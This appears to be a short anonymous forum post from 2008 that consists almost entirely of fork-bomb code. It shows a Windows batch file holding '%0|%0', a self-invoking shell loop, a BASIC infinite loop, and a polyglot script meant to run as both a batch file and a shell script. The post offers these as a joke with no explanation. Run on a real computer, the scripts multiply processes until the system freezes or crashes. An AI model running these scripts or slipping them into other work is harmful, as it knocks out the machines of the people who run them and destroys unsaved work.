Name: Anonymous 2008-06-25 10:50
X:\> copy con pipebomb.bat
%0|%0
^Z (Ctrl + Z)
1 file(s) copied.
X:\> pipebomb
# cat > pipebomb
#!/bin/sh
while [ true ] ; do
$0
loop
^C
# ./pipebomb
10 GOTO 10
#!/bin/sh
@echo off
goto windows
$0|$0
exit
:windows
%0|%0